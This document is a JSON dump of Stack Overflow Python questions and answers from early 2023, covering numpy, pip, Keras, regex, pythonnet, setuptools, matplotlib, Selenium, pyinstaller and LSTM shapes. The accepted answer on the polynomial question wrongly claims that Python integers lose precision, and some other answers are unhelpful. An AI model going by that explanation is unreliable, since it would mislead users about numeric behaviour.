[{"Q_Id":75354472,"CreationDate":"2023-02-05 18:15:55","Q_Score":2,"ViewCount":82,"Question":"I created a Pixel class for image processing (and learn how to build a class). A full image is then a 2D numpy.array of Pixel but when I added a __getattr__ method , it stopped to work, because numpy wants an __array_struct__ attribute.\nI tried to add this in __getattr__:\nif name == '__array_struct__':\n return object.__array_struct__\n\nNow it works but I get\n'''DeprecationWarning: An exception was ignored while fetching the attribute __array__ from an object of type 'Pixel'. With the exception of AttributeError NumPy will always raise this exception in the future. Raise this deprecation warning to see the original exception. (Warning added NumPy 1.21)\nI = np.array([Pixel()],dtype = Pixel)'''\n\na part of the class:\nclass Pixel:\n def __init__(self,*args):\n\n #things to dertermine RGB\n self.R,self.G,self.B = RGB\n \n #R,G,B are float between 0 and 255\n ...\n def __getattr__(self,name):\n \n if name == '__array_struct__':\n return object.__array_struct__\n if name[0] in 'iI':\n inted = True\n name = name[1:]\n else:\n inted = False\n \n if len(name)==1:\n n = name[0]\n\n if n in 'rgba':\n value = min(1,self.__getattribute__(n.upper())\/255)\n \n elif n in 'RGBA':\n value = min(255,self.__getattribute__(n))\n assert 0<=value\n else:\n h,s,v = rgb_hsv(self.rgb)\n if n in 'h':\n value = h\n elif n == 's':\n value = s\n elif n == 'v':\n value = v\n elif n == 'S':\n value = s*100\n elif n == 'V':\n value = v*100\n elif n == 'H':\n value = int(h)\n if inted:\n return int(value)\n else:\n return value\n else:\n value = []\n for n in name:\n try:\n v = self.__getattribute__(n)\n except AttributeError:\n v = self.__getattr__(n)\n if inted:\n value.append(int(v))\n else:\n value.append(v)\n return value","Title":"How do I store objects I created in np.array if a __getattr__ exists?","Tags":"python,numpy-ndarray","AnswerCount":2,"A_Id":75354910,"Answer":"Your class should 
either implement __array__ or raise an AttributeError when numpy tries to get it. The warning message says you raised some other error and that numpy will not accept that in the future. I haven't figured out your code well enough to know, but it could be that calling self.__getattr__(n) inside of __getattr__ hits a maximum recursion error.\nobject.__array_struct__ doesn't exist and so just by luck its AttributeError exception is what numpy was looking for. A better strategy is to raise AttributeError for anything that doesn't meet the selection criteria for your automatically generated attributes. Then you can take out the special case for __array_struct__ that doesn't work properly anyway.","Users Score":1,"is_accepted":true,"Score":1.2,"Available Count":1},{"Q_Id":75354617,"CreationDate":"2023-02-05 18:37:23","Q_Score":3,"ViewCount":1365,"Question":"When I do pip install dotenv it says this -\n`Collecting dotenv\nUsing cached dotenv-0.0.5.tar.gz (2.4 kB)\nPreparing metadata (setup.py) ... error\nerror: subprocess-exited-with-error\n\u00d7 python setup.py egg_info did not run successfully.\n\u2502 exit code: 1\n\u2570\u2500> [72 lines of output]\nC:\\Users\\Anju Tiwari\\AppData\\Local\\Programs\\Python\\Python311\\Lib\\site-packages\\setuptools\\installer.py:27: SetuptoolsDeprecationWarning: setuptools.installer is deprecated. 
Requirements should be satisfied by\na PEP 517 installer.\nwarnings.warn(\nerror: subprocess-exited-with-error\n python setup.py egg_info did not run successfully.\n exit code: 1\n \n [17 lines of output]\n Traceback (most recent call last):\n File \"\", line 2, in \n File \"\", line 14, in \n File \"C:\\Users\\Anju Tiwari\\AppData\\Local\\Temp\\pip-wheel-xv3lcsr9\\distribute_009ecda977a04fb699d5559aac28b737\\setuptools\\__init__.py\", line 2, in \n from setuptools.extension import Extension, Library\n File \"C:\\Users\\Anju Tiwari\\AppData\\Local\\Temp\\pip-wheel-xv3lcsr9\\distribute_009ecda977a04fb699d5559aac28b737\\setuptools\\extension.py\", line 5, in \n from setuptools.dist import _get_unpatched\n File \"C:\\Users\\Anju Tiwari\\AppData\\Local\\Temp\\pip-wheel-xv3lcsr9\\distribute_009ecda977a04fb699d5559aac28b737\\setuptools\\dist.py\", line 7, in \n from setuptools.command.install import install\n File \"C:\\Users\\Anju Tiwari\\AppData\\Local\\Temp\\pip-wheel-xv3lcsr9\\distribute_009ecda977a04fb699d5559aac28b737\\setuptools\\command\\__init__.py\", line 8, in \n from setuptools.command import install_scripts\n File \"C:\\Users\\Anju Tiwari\\AppData\\Local\\Temp\\pip-wheel-xv3lcsr9\\distribute_009ecda977a04fb699d5559aac28b737\\setuptools\\command\\install_scripts.py\", line 3, in \n from pkg_resources import Distribution, PathMetadata, ensure_directory\n File \"C:\\Users\\Anju Tiwari\\AppData\\Local\\Temp\\pip-wheel-xv3lcsr9\\distribute_009ecda977a04fb699d5559aac28b737\\pkg_resources.py\", line 1518, in \n register_loader_type(importlib_bootstrap.SourceFileLoader, DefaultProvider)\n ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^\n AttributeError: module 'importlib._bootstrap' has no attribute 'SourceFileLoader'\n [end of output]\n \n note: This error originates from a subprocess, and is likely not a problem with pip.\n error: metadata-generation-failed\n \n Encountered error while generating package metadata.\n \n See above for output.\n \n note: This is an issue with 
the package mentioned above, not pip.\n hint: See above for details.\n Traceback (most recent call last):\n File \"C:\\Users\\Anju Tiwari\\AppData\\Local\\Programs\\Python\\Python311\\Lib\\site-packages\\setuptools\\installer.py\", line 82, in fetch_build_egg\n subprocess.check_call(cmd)\n File \"C:\\Users\\Anju Tiwari\\AppData\\Local\\Programs\\Python\\Python311\\Lib\\subprocess.py\", line 413, in check_call\n raise CalledProcessError(retcode, cmd)\n subprocess.CalledProcessError: Command '['C:\\\\Users\\\\Anju Tiwari\\\\AppData\\\\Local\\\\Programs\\\\Python\\\\Python311\\\\python.exe', '-m', 'pip', '--disable-pip-version-check', 'wheel', '--no-deps', '-w', 'C:\\\\Users\\\\ANJUTI~1\\\\AppData\\\\Local\\\\Temp\\\\tmpcq62ekpo', '--quiet', 'distribute']' returned non-zero exit status 1.\n \n The above exception was the direct cause of the following exception:\n \n Traceback (most recent call last):\n File \"\", line 2, in \n File \"\", line 34, in \n File \"C:\\Users\\Anju Tiwari\\AppData\\Local\\Temp\\pip-install-j7w9rs9u\\dotenv_0f4daa500bef4242bb24b3d9366608eb\\setup.py\", line 13, in \n setup(name='dotenv',\n File \"C:\\Users\\Anju Tiwari\\AppData\\Local\\Programs\\Python\\Python311\\Lib\\site-packages\\setuptools\\__init__.py\", line 86, in setup\n _install_setup_requires(attrs)\n File \"C:\\Users\\Anju Tiwari\\AppData\\Local\\Programs\\Python\\Python311\\Lib\\site-packages\\setuptools\\__init__.py\", line 80, in _install_setup_requires\n dist.fetch_build_eggs(dist.setup_requires)\n File \"C:\\Users\\Anju Tiwari\\AppData\\Local\\Programs\\Python\\Python311\\Lib\\site-packages\\setuptools\\dist.py\", line 875, in fetch_build_eggs\n resolved_dists = pkg_resources.working_set.resolve(\n ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^\n File \"C:\\Users\\Anju Tiwari\\AppData\\Local\\Programs\\Python\\Python311\\Lib\\site-packages\\pkg_resources\\__init__.py\", line 789, in resolve\n dist = best[req.key] = env.best_match(\n ^^^^^^^^^^^^^^^\n File \"C:\\Users\\Anju 
Tiwari\\AppData\\Local\\Programs\\Python\\Python311\\Lib\\site-packages\\pkg_resources\\__init__.py\", line 1075, in best_match\n return self.obtain(req, installer)\n ^^^^^^^^^^^^^^^^^^^^^^^^^^^\n File \"C:\\Users\\Anju Tiwari\\AppData\\Local\\Programs\\Python\\Python311\\Lib\\site-packages\\pkg_resources\\__init__.py\", line 1087, in obtain\n return installer(requirement)\n ^^^^^^^^^^^^^^^^^^^^^^\n File \"C:\\Users\\Anju Tiwari\\AppData\\Local\\Programs\\Python\\Python311\\Lib\\site-packages\\setuptools\\dist.py\", line 945, in fetch_build_egg\n return fetch_build_egg(self, req)\n ^^^^^^^^^^^^^^^^^^^^^^^^^^\n File \"C:\\Users\\Anju Tiwari\\AppData\\Local\\Programs\\Python\\Python311\\Lib\\site-packages\\setuptools\\installer.py\", line 84, in fetch_build_egg\n raise DistutilsError(str(e)) from e\n distutils.errors.DistutilsError: Command '['C:\\\\Users\\\\Anju Tiwari\\\\AppData\\\\Local\\\\Programs\\\\Python\\\\Python311\\\\python.exe', '-m', 'pip', '--disable-pip-version-check', 'wheel', '--no-deps', '-w', 'C:\\\\Users\\\\ANJUTI~1\\\\AppData\\\\Local\\\\Temp\\\\tmpcq62ekpo', '--quiet', 'distribute']' returned non-zero exit status 1.\n [end of output]\n\nnote: This error originates from a subprocess, and is likely not a problem with pip.\nerror: metadata-generation-failed\n\u00d7 Encountered error while generating package metadata.\n\u2570\u2500> See above for output.\nnote: This is an issue with the package mentioned above, not pip.\nhint: See above for details.`\nI tried doing pip install dotenv but then that error come shown above.\nI also tried doing pip install -U dotenv but it didn't work and the same error came. 
Can someone please help me fix this?","Title":"Pip install dotenv, Error 1 Windows 10 Pro","Tags":"python,error-handling,pip,download,dotenv","AnswerCount":1,"A_Id":75354709,"Answer":"pip install python-dotenv worked for me.","Users Score":7,"is_accepted":true,"Score":1.2,"Available Count":1},{"Q_Id":75355949,"CreationDate":"2023-02-05 22:31:29","Q_Score":1,"ViewCount":47,"Question":"def mean(x):\n return(sum(x)\/len(x))\n\ndef variance(x):\n x_mean = mean(x)\n return sum((x-x_mean)**2)\/(len(x)-1)\n\ndef standard_deviation(x):\n return math.sqrt(variance(x))\n\nThe functions above build on each other. They depend on the previous function. What is a good way to implement this in Python? Should I use a class which has these functions? Are there other options?","Title":"Functions depending on other functions in Python","Tags":"python","AnswerCount":1,"A_Id":75356009,"Answer":"Because they are widely applicable, keep them as they are\nMany parts of a program may need to calculate these statistics, and it will save wordiness to not have to get them out of a class. Moreover, the functions actually don't need any class-stored data: they would simply be static methods of a class. (Which in the old days, we would have simply called \"functions\"!)\nIf they needed to store internal information to work correctly, that is a good reason to put them into a class\nThe advantage in that case is that it is more obvious to the programmer what information is being shared. Moreover, you might want to create two or more instances that had different sets of shared data. That is not the case here.","Users Score":3,"is_accepted":true,"Score":1.2,"Available Count":1},{"Q_Id":75356060,"CreationDate":"2023-02-05 22:54:14","Q_Score":1,"ViewCount":304,"Question":"I need a product's unit of stock(quantity). 
Is it possible with SP API, if possible how can I get it?\nNote: I can get it with SKU like the following code but the product is not listed by my sellers.\nfrom sp_api.api import Inventories\nquantity = Inventories(credentials=credentials, marketplace=Marketplaces.FR).get_inventory_summary_marketplace(**{\n \"details\": False,\n \"marketplaceIds\": [\"A13V1IB3VIYZZH\"],\n \"sellerSkus\": [\"MY_SKU_1\" , \"MY_SKU_2\"]\n})\nprint(quantity)","Title":"How can I get quantity with SP API Python","Tags":"python,amazon-selling-partner-api","AnswerCount":1,"A_Id":75561704,"Answer":"from sp_api.api import Inventories\nquantity = Inventories(credentials=credentials, marketplace=Marketplaces.FR).get_inventory_summary_marketplace(**{\n\"details\": False,\n\"marketplaceIds\": [\"A13V1IB3VIYZZH\"],\n\"sellerSkus\": [\"MY_SKU_1\" , \"MY_SKU_2\"]\n})\nprint(quantity)","Users Score":0,"is_accepted":false,"Score":0.0,"Available Count":1},{"Q_Id":75356826,"CreationDate":"2023-02-06 02:20:41","Q_Score":1,"ViewCount":3566,"Question":"I'm training a VAE with TensorFlow Keras backend and I'm using Adam as the optimizer. the code I used is attached below.\n def compile(self, learning_rate=0.0001):\n optimizer = tf.keras.optimizers.Adam(learning_rate=learning_rate)\n self.model.compile(optimizer=optimizer,\n loss=self._calculate_combined_loss,\n metrics=[_calculate_reconstruction_loss,\n calculate_kl_loss(self)])\n\nThe TensorFlow version I'm using is 2.11.0. The error I'm getting is\nAttributeError: 'Adam' object has no attribute 'get_updates'\n\nI'm suspecting the issues arise because of the version mismatch. Can someone please help me to sort out the issue? 
Thanks in advance.","Title":"AttributeError: 'Adam' object has no attribute 'get_updates'","Tags":"python,tensorflow","AnswerCount":3,"A_Id":76288587,"Answer":"Of late, I had to use the tensorflow2.5 and I replaced all \"import keras\" by \"import tensorflow.keras\".\nNow I use tensorflow2.12 and I met this error and when I returned those replacements; this error was removed.\nthank you!","Users Score":1,"is_accepted":false,"Score":0.0665680765,"Available Count":2},{"Q_Id":75356826,"CreationDate":"2023-02-06 02:20:41","Q_Score":1,"ViewCount":3566,"Question":"I'm training a VAE with TensorFlow Keras backend and I'm using Adam as the optimizer. the code I used is attached below.\n def compile(self, learning_rate=0.0001):\n optimizer = tf.keras.optimizers.Adam(learning_rate=learning_rate)\n self.model.compile(optimizer=optimizer,\n loss=self._calculate_combined_loss,\n metrics=[_calculate_reconstruction_loss,\n calculate_kl_loss(self)])\n\nThe TensorFlow version I'm using is 2.11.0. The error I'm getting is\nAttributeError: 'Adam' object has no attribute 'get_updates'\n\nI'm suspecting the issues arise because of the version mismatch. Can someone please help me to sort out the issue? Thanks in advance.","Title":"AttributeError: 'Adam' object has no attribute 'get_updates'","Tags":"python,tensorflow","AnswerCount":3,"A_Id":76295165,"Answer":"Two ways worked for me,\n\nBy using tf.keras.optimizers.legacy.SGD - instead of tf.keras.optimizers.SGD\n\nImporting statement is changed from\nimport tensorflow.keras as keras to 'import keras'","Users Score":0,"is_accepted":false,"Score":0.0,"Available Count":2},{"Q_Id":75356848,"CreationDate":"2023-02-06 02:27:11","Q_Score":2,"ViewCount":65,"Question":"I have a column that has name variations that I'd like to clean up. 
I'm having trouble with the regex expression to remove everything after the first word following a comma.\nd = {'names':['smith,john s','smith, john', 'brown, bob s', 'brown, bob']}\nx = pd.DataFrame(d)\n\nTried:\nx['names'] = [re.sub(r'\/.\s+[^\s,]+\/','', str(x)) for x in x['names']]\n\nDesired Output:\n['smith,john','smith, john', 'brown, bob', 'brown, bob']\n\nNot sure why my regex isn't working, but any help would be appreciated.","Title":"Regex - removing everything after first word following a comma","Tags":"python,regex","AnswerCount":2,"A_Id":75356969,"Answer":"Try re.sub(r'(,\s*\w+).*', r'\1', str(x))...\nPut the triggered pattern into capture group 1 and then restore it in what gets replaced. Note that Python's re module does not use \/...\/ delimiters or $1 backreferences; the pattern is a plain string and the group is restored with r'\1'.","Users Score":0,"is_accepted":false,"Score":0.0,"Available Count":1},{"Q_Id":75357819,"CreationDate":"2023-02-06 06:02:38","Q_Score":1,"ViewCount":76,"Question":"I have training data with 2 dimension. (200 results of 4 features)\nI proved 100 different applications with 10 repetition resulting 1000 csv files.\nI want to stack each csv results for machine learning.\nBut I don't know how.\neach of my csv files look like below.\ntest1.csv to numpy array data\n[[0 'crc32_pclmul' 445 0]\n [0 'crc32_pclmul' 270 4096]\n [0 'crc32_pclmul' 234 8192]\n ...\n [249 'intel_pmt' 272 4096]\n [249 'intel_pmt' 224 8192]\n [249 'intel_pmt' 268 12288]]\n\nI tried below python code.\npath = os.getcwd()\ncsv_files = glob.glob(os.path.join(path, \"*.csv\"))\ncnt=0\nfor f in csv_files:\n cnt +=1\n seperator = '_'\n app = os.path.basename(f).split(seperator, 1)[0]\n\n if cnt==1:\n a = np.array(preprocess(f))\n b = np.array(app)\n else:\n a = np.vstack((a, np.array(preprocess(f))))\n b = np.append(b,app)\nprint(a)\nprint(b)\n\npreprocess function returns df.to_numpy results for each csv files.\nMy expectation was like below. 
a(1000, 200, 4)\n[[[0 'crc32_pclmul' 445 0]\n [0 'crc32_pclmul' 270 4096]\n [0 'crc32_pclmul' 234 8192]\n ...\n [249 'intel_pmt' 272 4096]\n [249 'intel_pmt' 224 8192]\n [249 'intel_pmt' 268 12288]],\n[[0 'crc32_pclmul' 445 0]\n [0 'crc32_pclmul' 270 4096]\n [0 'crc32_pclmul' 234 8192]\n ...\n [249 'intel_pmt' 272 4096]\n [249 'intel_pmt' 224 8192]\n [249 'intel_pmt' 268 12288]],\n...\n[[0 'crc32_pclmul' 445 0]\n [0 'crc32_pclmul' 270 4096]\n [0 'crc32_pclmul' 234 8192]\n ...\n [249 'intel_pmt' 272 4096]\n [249 'intel_pmt' 224 8192]\n [249 'intel_pmt' 268 12288]]]\n\nHowever, I'm getting this. a(200000, 4)\n[[0 'crc32_pclmul' 445 0]\n [0 'crc32_pclmul' 270 4096]\n [0 'crc32_pclmul' 234 8192]\n ...\n [249 'intel_pmt' 272 4096]\n [249 'intel_pmt' 224 8192]\n [249 'intel_pmt' 268 12288]]\n\nI want to access each csv results using a[0] to a[1000] each sub-array looks like (200,4)\nHow can I solve the problem? I'm quite lost","Title":"make 3d numpy array using for loop in python","Tags":"python,arrays,numpy,3d,2d","AnswerCount":3,"A_Id":75357911,"Answer":"Make a new list (outside of the loop) and append each item to that new list after reading.","Users Score":0,"is_accepted":false,"Score":0.0,"Available Count":1},{"Q_Id":75360485,"CreationDate":"2023-02-06 11:03:48","Q_Score":1,"ViewCount":104,"Question":"I am new to docker and using apptainer for that.\nthe def file is: firstApp.def:\n`Bootstrap: docker\nFrom: ubuntu:22.04\n\n%environment\n export LC_ALL=C\n`\n\nthen I built it as follows and I want it to be writable (I hope I am not so naive), so I can install some packages later:\n`apptainer build --sandbox --fakeroot firstApp.sif firstApp.def\n`\n\nnow I do not know how to install Python3 (preferably, 3.8 or later).\nI tried to add the following command lines to the def file:\n`%post\n apt-get -y install update\n apt-get -y install python3.8 `\n\nit raises these errors as well even without \"apt-get -y install python3.8\":\nReading package lists... 
Done\nBuilding dependency tree... Done\nReading state information... Done\nE: Unable to locate package update\nFATAL: While performing build: while running engine: exit status 100","Title":"How to install Python or R in an apptainer?","Tags":"python,docker,apptainer","AnswerCount":1,"A_Id":75740197,"Answer":"This work for me\n%post\napt-get update && apt-get install -y netcat python3.8","Users Score":0,"is_accepted":false,"Score":0.0,"Available Count":1},{"Q_Id":75360628,"CreationDate":"2023-02-06 11:19:44","Q_Score":1,"ViewCount":45,"Question":"I defined a function which returns a third order polynomial function for either a value, a list or a np.array:\ndef two_d_third_order(x, a, b, c, d):\n return a + np.multiply(b, x) + np.multiply(c, np.multiply(x, x)) + np.multiply(d, np.multiply(x, np.multiply(x, x)))\n\nThe issue I noticed is, however, when I use \"two_d_third_order\" on the following two inputs:\n1500\n1500.0\nWith (a, b, c, d) = (1.20740028e+00, -2.93682465e-03, 2.29938078e-06, -5.09134552e-10), I get two different results:\n2.4441\n0.2574\n, respectively. I don't know how this is possible, and any help would be appreciated.\nI tried several inputs, and somehow the inclusion of a floating point on certain values (despite representing the same numerical value) changes the end result.","Title":"Python code yielding different result for same numerical value, depending on inclusion of precision point","Tags":"python-3.x,numpy,scipy","AnswerCount":2,"A_Id":75362712,"Answer":"Python uses implicit data type conversions. When you use only integers (like 1500), there is a loss of precision in all subsequent operations. Whereas when you pass it a float or double (like 1500.0), subsequent operations are performed with the associated datatype, i.e in this case with higher precision.\nThis is not a \"bug\" so to speak, but generally how Python operates without the explicit declaration of data types. 
Languages like C and C++ require explicit data type declarations and explicit data type casting to ensure operations are performed in the prescribed precision formats. Can be a boon or a bane depending on usage.","Users Score":0,"is_accepted":true,"Score":1.2,"Available Count":1},{"Q_Id":75362126,"CreationDate":"2023-02-06 13:46:28","Q_Score":2,"ViewCount":1574,"Question":"I try to use an assembly for .NET framework 4.8 via Pythonnet. I am using version 3.0.1 with Python 3.10. The documentation of Pythonnet is stating:\n\nYou must set Runtime.PythonDLL property or PYTHONNET_PYDLL environment variable starting with version 3.0, otherwise you will receive BadPythonDllException (internal, derived from MissingMethodException) upon calling Initialize. Typical values are python38.dll (Windows), libpython3.8.dylib (Mac), libpython3.8.so (most other Unix-like operating systems).\n\nHowever, the documentation unfortunately is not stating how the property is set and I do not understand how to do this.\nWhen I try:\nimport clr\nfrom pythonnet import load\n\nload('netfx')\n\nclr.AddReference(r'path\\to\\my.dll')\n\nunsurprisingly the following error is coming up\nFailed to initialize pythonnet: System.InvalidOperationException: This property must be set before runtime is initialized\n bei Python.Runtime.Runtime.set_PythonDLL(String value)\n bei Python.Runtime.Loader.Initialize(IntPtr data, Int32 size)\n bei Python.Runtime.Runtime.set_PythonDLL(String value)\n bei Python.Runtime.Loader.Initialize(IntPtr data, Int32 size)\n[...]\nin load\n raise RuntimeError(\"Failed to initialize Python.Runtime.dll\")\nRuntimeError: Failed to initialize Python.Runtime.dll\n\nThe question now is, where and how the Runtime.PythonDLL property or PYTHONNET_PYDLL environment variable is set\nThanks,\nJens","Title":"Trouble shooting using Pythonnet and setting Runtime.PythonDLL property","Tags":"python,.net,clr,python.net","AnswerCount":2,"A_Id":75368080,"Answer":"I believe this is because import clr 
internally calls pythonnet.load, and in the version of pythonnet you are using this situation does not print any warning.\nE.g. the right way is to call load before you call import clr for the first time.","Users Score":0,"is_accepted":false,"Score":0.0,"Available Count":1},{"Q_Id":75362342,"CreationDate":"2023-02-06 14:04:40","Q_Score":1,"ViewCount":27,"Question":"I have a virtual environment where I am developing a Python package. The folder tree is the following:\nworking-folder\n|-setup.py\n|-src\n |-my_package\n |-__init__.py\n |-my_subpackage\n |-__init__.py\n |-main.py\n\nmain.py contains a function my_main that ideally, I would want to run as a bash command.\nI am using setuptools and the setup function contains the following line of code\nsetup(\n...\n entry_point={\n \"console_scripts\": [\n \"my-command = src.my_package.my_subpackage.main:my_main\",\n ]\n },\n...\n)\n\n\nWhen I run pip install . the package gets correctly installed in the virtual environment. However, when running my-command on the shell, the command does not exist.\nAm I missing some configuration to correctly generate the entry point?","Title":"Python entry_point in virtual environment not working","Tags":"python,package,virtualenv,setuptools,entry-point","AnswerCount":1,"A_Id":75386087,"Answer":"I simply mistyped the argument entry_point, which actually is entry_points. Unfortunately, I was not getting any output errors.","Users Score":0,"is_accepted":true,"Score":1.2,"Available Count":1},{"Q_Id":75362809,"CreationDate":"2023-02-06 14:45:06","Q_Score":2,"ViewCount":274,"Question":"I have a figure with different plots on several axes. Some of those axes do not play well with some of the navigation toolbar actions. In particular, the shortcuts to go back to the home view and the ones to go to the previous and next views.\nIs there a way to disable those shortcuts only for those axes? 
For example, in one of the two in the figure from the example below.\nimport matplotlib.pyplot as plt\n\n# Example data for two plots\nx1 = [1, 2, 3, 4]\ny1 = [10, 20, 25, 30]\nx2 = [2, 3, 4, 5]\ny2 = [5, 15, 20, 25]\n\n# Create figure and axes objects\nfig, (ax1, ax2) = plt.subplots(1, 2, figsize=(10, 5))\n\n# Plot data on the first axis\nax1.plot(x1, y1)\nax1.set_title(\"First Plot\")\n\n# Plot data on the second axis\nax2.plot(x2, y2)\nax2.set_title(\"Second Plot\")\n\n# Show plot\nplt.show()\n\n\nEdit 1:\nThe following method will successfully disable the pan and zoom tools from the GUI toolbox in the target axis.\nax2.set_navigate(False)\n\nHowever, the home, forward, and back buttons remain active. Is there a trick to disable also those buttons in the target axis?","Title":"How to disable the Matplotlib navigation toolbar in a particular axis?","Tags":"python,matplotlib,user-interface,widget,interactive","AnswerCount":3,"A_Id":75447405,"Answer":"You can try to use ax2.get_xaxis().set_visible(False)","Users Score":0,"is_accepted":false,"Score":0.0,"Available Count":1},{"Q_Id":75363011,"CreationDate":"2023-02-06 15:03:27","Q_Score":1,"ViewCount":362,"Question":"I am trying to automate the process of liking pages on Facebook. 
I've got a list of each page's link and I want to open and like them one by one.\nI think the Like button doesn't have any id or name, but it is in a span class.\nLike<\/span>\n\nI used this code to find and click on the \"Like\" button.\ndef likePages(links, driver):\n for link in links:\n driver.get(link)\n time.sleep(3)\n driver.find_element(By.LINK_TEXT, 'Like').click()\n\nAnd I get the following error when I run the function:\nselenium.common.exceptions.NoSuchElementException: Message: no such element: Unable to locate element","Title":"How to find and click the \"Like\" button on Facebook page using Selenium","Tags":"python,selenium,selenium-webdriver,xpath,nosuchelementexception","AnswerCount":2,"A_Id":75363222,"Answer":"You cannot use Link_Text locator as Like is not a hyperlink. Use XPath instead, see below:\nXPath : \/\/span[contains(text(),\"Like\")]\ndriver.find_element(By.XPATH, '\/\/span[contains(text(),\"Like\")]').click()","Users Score":0,"is_accepted":false,"Score":0.0,"Available Count":1},{"Q_Id":75367685,"CreationDate":"2023-02-06 23:46:22","Q_Score":1,"ViewCount":266,"Question":"i have a package and in it i use pyproject.toml\nand for proper typing i need stubs generated, although\nits kinda annoying to generate them manually every time,\nso, is there a way to do it automatically using it ?\ni just want it to run stubgen and thats it, just so\nmypy sees the stubs and its annoying seeing linters\nthrow warnings and you keep having to # type: ignore\nheres what i have as of now, i rarely do this so its probably\nnot that good :\n[build-system]\nrequires = [\"setuptools\", \"setuptools-scm\"]\nbuild-backend = \"setuptools.build_meta\"\n\n[project]\nname = \"<...>\"\nauthors = [\n {name = \"<...>\", email = \"<...>\"},\n]\ndescription = \"<...>\"\nreadme = \"README\"\nrequires-python = \">=3.10\"\nkeywords = [\"<...>\"]\nlicense = {text = \"GNU General Public License v3 or later (GPLv3+)\"}\nclassifiers = [\n \"License :: OSI Approved :: GNU General 
Public License v3 or later (GPLv3+)\",\n \"Programming Language :: Python :: 3\",\n]\ndependencies = [\n \"<...>\",\n]\ndynamic = [\"version\"]\n\n\n[tool.setuptools]\ninclude-package-data = true\n\n[tool.setuptools.package-data]\n<...> = [\"*.pyi\"]\n\n[tool.pyright]\npythonVersion = \"3.10\"\nexclude = [\n \"venv\",\n \"**\/node_modules\",\n \"**\/__pycache__\",\n \".git\"\n]\ninclude = [\"src\", \"scripts\"]\nvenv = \"venv\"\nstubPath = \"src\/stubs\"\ntypeCheckingMode = \"strict\"\nuseLibraryCodeForTypes = true\nreportMissingTypeStubs = true\n\n[tool.mypy]\nexclude = [\n \"^venv\/.*\",\n \"^node_modules\/.*\",\n \"^__pycache__\/.*\",\n]\n\nthanks for the answers in advance","Title":"how to automatically generate mypy stubs using pyproject.toml","Tags":"python,python-3.x,mypy,pyproject.toml","AnswerCount":1,"A_Id":75371297,"Answer":"just make a shellscript and add it to pyproject.toml as a script\n:+1:","Users Score":0,"is_accepted":false,"Score":0.0,"Available Count":1},{"Q_Id":75368407,"CreationDate":"2023-02-07 02:27:36","Q_Score":1,"ViewCount":43,"Question":"I made an .exe file using pyinstaller, but when I run the file it opens a PowerShell window as well. I was wondering if there is anyway I can get it to not open so I just have the python program open.\nI haven't really tried anything as I don't really know what I'm doing.","Title":".exe file opening Powershell Window","Tags":"python,powershell,pyinstaller,exe","AnswerCount":2,"A_Id":75368754,"Answer":"if you run it from terminal, you can use this command:\nstart \/min \"\" \"path\\file_name.exe\"","Users Score":0,"is_accepted":false,"Score":0.0,"Available Count":2},{"Q_Id":75368407,"CreationDate":"2023-02-07 02:27:36","Q_Score":1,"ViewCount":43,"Question":"I made an .exe file using pyinstaller, but when I run the file it opens a PowerShell window as well. 
I was wondering if there is any way I can get it to not open so I just have the python program open.\nI haven't really tried anything as I don't really know what I'm doing.","Title":".exe file opening Powershell Window","Tags":"python,powershell,pyinstaller,exe","AnswerCount":2,"A_Id":75368529,"Answer":"When running pyinstaller be sure to use the --windowed argument. For example:\n\npyinstaller --onefile myFile.py --windowed","Users Score":0,"is_accepted":true,"Score":1.2,"Available Count":2},{"Q_Id":75368490,"CreationDate":"2023-02-07 02:45:45","Q_Score":1,"ViewCount":112,"Question":"this is my data X_train prepared for LSTM of shape (7000, 2, 200)\n[[[0.500858 0. 0.5074856 ... 1. 0.4911533 0. ]\n [0.4897923 0. 0.48860878 ... 0. 0.49446714 1. ]]\n\n [[0.52411383 0. 0.52482396 ... 0. 0.48860878 1. ]\n [0.4899698 0. 0.48819458 ... 1. 0.4968341 1. ]]\n\n ...\n\n [[0.6124623 1. 0.6118705 ... 1. 0.6328777 0. ]\n [0.6320492 0. 0.63512635 ... 1. 0.6960175 0. ]]\n\n [[0.6118113 1. 0.6126989 ... 0. 0.63512635 1. ]\n [0.63530385 1. 0.63595474 ... 1. 0.69808865 0. ]]]\n\nI create my sequential model\nmodel = Sequential()\nmodel.add(LSTM(units = 50, activation = 'relu', input_shape = (X_train.shape[1], 200)))\nmodel.add(Dropout(0.2))\nmodel.add(Dense(1, activation = 'linear'))\nmodel.compile(loss = 'mean_squared_error', optimizer = 'adam')\n\nThen I fit my model:\nhistory = model.fit(\n X_train, \n Y_train, \n epochs = 20, \n batch_size = 200, \n validation_data = (X_test, Y_test), \n verbose = 1, \n shuffle = False,\n)\nmodel.summary()\n\nAnd at the end I can see something like this:\n Layer (type) Output Shape Param # \n=================================================================\n lstm_16 (LSTM) (None, 2, 50) 50200 \n \n dropout_10 (Dropout) (None, 2, 50) 0 \n \n dense_10 (Dense) (None, 2, 1) 51 \n\nWhy does it say that output shape has a None value as a first element? Is it a problem? Or should it be like this? 
What does it change and how can I change it?\nI will appreciate any help, thanks!","Title":"Keras LSTM None value output shape","Tags":"python,tensorflow,keras,lstm","AnswerCount":1,"A_Id":75368566,"Answer":"The first value in TensorFlow is always reserved for the batch-size. Your model doesn't know in advance what is your batch-size so it makes it None. If we go into more details let's suppose your dataset is 1000 samples and your batch-size is 32. So, 1000\/32 will become 31.25, if we just take the floor value which is 31. So, there would be 31 batches in a total of size 32. But if you look here the total sample size of your dataset is 1000 but you have 31 batches of size 32, which is 32 * 31 = 992, where 1000 - 992 = 8, it means there would be one more batch of size 8. But the model doesn't know in advance so, what does it do? it reserves a space in the memory where it doesn't define a specific shape for it, in other words, the memory is dynamic for the batch-size. Therefore, you are seeing it None there. So, the model doesn't know in advance what would be the shape of my batch-size so it makes it None so it should know it later when it computes the first epoch meaning computes all of the batches.\nThe None value can't be changed because it is Dynamic in Tensorflow, the model knows it and fix it when your model completes its first epoch. So, always set the shapes which are after it like in your case it is (2, 200). 
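The batch arithmetic used in this answer (1000 samples, batch size 32) can be checked with a short sketch; the numbers are taken from the example above:

```python
# 1000 samples split into batches of 32: 31 full batches plus a smaller final batch.
samples, batch_size = 1000, 32

full_batches, remainder = divmod(samples, batch_size)
print(full_batches)               # 31 full batches
print(remainder)                  # 8 samples left over for one final partial batch
print(full_batches * batch_size)  # 992 samples covered by the full batches
```

Because that final batch can have a different size, the framework leaves the batch dimension as None instead of fixing it to any one value.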
